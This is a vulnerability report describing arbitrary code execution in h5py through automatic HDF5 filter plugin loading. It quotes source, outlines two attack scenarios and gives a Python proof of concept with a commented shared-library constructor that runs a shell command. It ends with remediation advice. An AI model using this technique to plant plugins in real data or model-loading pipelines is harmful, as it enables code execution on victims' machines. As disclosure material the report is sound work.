h5py-filter-plugin-rce-poc / h5py-01-filter-plugin-code-execution.md
ryansecuritytest-fanpierlabs's picture
Upload h5py-01-filter-plugin-code-execution.md with huggingface_hub
6f3a7c5 verified
# Arbitrary Code Execution via Automatic HDF5 Filter Plugin Loading in h5py
## Target
- **Project:** h5py/h5py
- **URL:** https://github.com/h5py/h5py
- **Component:** HDF5 filter pipeline / dataset read path
- **CWE:** CWE-94 (Improper Control of Generation of Code / Code Injection)
## Severity: HIGH
## Summary
When h5py opens an HDF5 file and reads a dataset that uses a custom (non-builtin) compression filter, the underlying HDF5 library automatically searches for and loads a shared library (`.so`/`.dll`) filter plugin from directories in the plugin search path. h5py exposes APIs (`h5py.h5pl`) to manipulate this search path but does **nothing** to restrict or disable this automatic dynamic loading behavior. A crafted HDF5 file specifying a custom filter ID will cause HDF5 to load and execute arbitrary code from a shared library placed in the plugin search path -- which can be controlled via the `HDF5_PLUGIN_PATH` environment variable or through the `h5py.h5pl.append()`/`prepend()` APIs.
## Vulnerable Code
### File: `h5py/h5py/h5z.pyx` (lines 102-121)
```python
@with_phil
def register_filter(uintptr_t cls_pointer_address):
'''(INT cls_pointer_address) => BOOL
Register a new filter from the memory address of a buffer containing a
``H5Z_class1_t`` or ``H5Z_class2_t`` data structure describing the filter.
`cls_pointer_address` can be retrieved from a HDF5 filter plugin dynamic
library::
import ctypes
filter_clib = ctypes.CDLL("/path/to/my_hdf5_filter_plugin.so")
filter_clib.H5PLget_plugin_info.restype = ctypes.c_void_p
h5py.h5z.register_filter(filter_clib.H5PLget_plugin_info())
'''
return <int>H5Zregister(<const void *>cls_pointer_address) >= 0
```
### File: `h5py/h5py/h5pl.pyx` (lines 20-25)
```python
cpdef append(const char* search_path):
"""(STRING search_path)
Add a directory to the end of the plugin search path.
"""
H5PLappend(search_path)
```
### File: `h5py/h5py/_hl/filters.py` (lines 295-299)
When a dataset is created with an integer filter ID, h5py passes it directly to HDF5:
```python
elif isinstance(compression, int):
if not allow_unknown_filter and not h5z.filter_avail(compression):
raise ValueError("Unknown compression filter number: %s" % compression)
plist.set_filter(compression, h5z.FLAG_OPTIONAL, compression_opts)
```
### Automatic Plugin Loading (HDF5 library behavior)
When `H5Dread()` is called on a dataset with a filter ID that is not currently registered, HDF5 searches the plugin path for `.so`/`.dll` files, loads them via `dlopen()`, calls `H5PLget_plugin_info()` to obtain the filter class, and registers it automatically. This happens transparently inside:
- `h5py/h5py/_proxy.templ.pyx` line 120: `H5Dread(dset, mtype, mspace, fspace, dxpl, progbuf)`
- `h5py/h5py/_proxy.templ.pyx` line 151: `H5Dread(dset, dstype, cspace, fspace, dxpl, conv_buf)`
## Exploitation
### Attack Scenario 1: Crafted HDF5 file + environment manipulation
1. An attacker sets `HDF5_PLUGIN_PATH` to a directory they control (e.g., via `.bashrc` manipulation, Docker environment, or CI/CD configuration)
2. They place a malicious `.so` file in that directory implementing the `H5PLget_plugin_info` symbol
3. They provide a crafted HDF5 file with a dataset using a custom filter ID matching their plugin
4. When the victim opens the file and reads the dataset with h5py, the malicious shared library is automatically loaded and its code executes
### Attack Scenario 2: h5pl API abuse in shared environments
In applications where users can influence the plugin path via `h5py.h5pl.append()` before file loading:
```python
import h5py
# Attacker injects malicious plugin path
h5py.h5pl.append(b'/attacker/controlled/path')
# Later, when legitimate code reads a crafted HDF5 file:
with h5py.File('crafted.h5', 'r') as f:
data = f['dataset'][:] # Triggers plugin loading -> RCE
```
### Proof of Concept
```python
import h5py
import numpy as np
import struct
import tempfile
import os
# Step 1: Create a malicious shared library (filter plugin)
# In practice, compile a .so with H5PLget_plugin_info that runs arbitrary code
# For demonstration, this would be:
# gcc -shared -o malicious_filter.so -fPIC malicious_filter.c
# Where malicious_filter.c contains:
# #include <stdlib.h>
# void __attribute__((constructor)) init() { system("id > /tmp/pwned"); }
# Step 2: Set plugin path
os.environ['HDF5_PLUGIN_PATH'] = '/tmp/malicious_plugins'
# Step 3: Create HDF5 file with custom filter
CUSTOM_FILTER_ID = 32000 # Use a non-standard filter ID
with h5py.File('/tmp/crafted.h5', 'w') as f:
# Use allow_unknown_filter to bypass availability check during creation
f.create_dataset(
'payload',
data=np.zeros(100),
compression=CUSTOM_FILTER_ID,
compression_opts=(0,),
chunks=(100,),
allow_unknown_filter=True
)
# Step 4: When any user reads this file, the filter plugin is loaded
with h5py.File('/tmp/crafted.h5', 'r') as f:
data = f['payload'][:] # This triggers automatic plugin search and dlopen()
```
## Impact
- **Arbitrary code execution** in the context of the process reading the HDF5 file
- This is particularly dangerous in:
- Data science pipelines that process untrusted HDF5 files
- ML model loading (Keras/TensorFlow models are stored as HDF5)
- Scientific data sharing workflows
- Jupyter notebook environments processing external data
- h5py provides no mechanism to disable automatic filter plugin loading
- The `allow_unknown_filter=True` parameter on dataset creation is designed for this workflow, explicitly supporting the use case
## Remediation
1. **Provide an option to disable automatic filter plugin loading** when opening files for reading. HDF5 1.10+ supports `H5PLset_loading_state()` to disable plugin loading.
2. **Add a security warning** in documentation about the risks of processing untrusted HDF5 files
3. **Consider defaulting to disabled plugin loading** for read-only file access, requiring explicit opt-in
4. **Validate or restrict plugin paths** added via `h5pl.append()`/`prepend()`
## References
- HDF5 Dynamic Plugin Loading: https://docs.hdfgroup.org/hdf5/develop/group___h5_p_l.html
- HDF5 Filter Plugins: https://github.com/HDFGroup/hdf5_plugins
- h5py filter documentation: https://docs.h5py.org/en/stable/high/dataset.html#filter-pipeline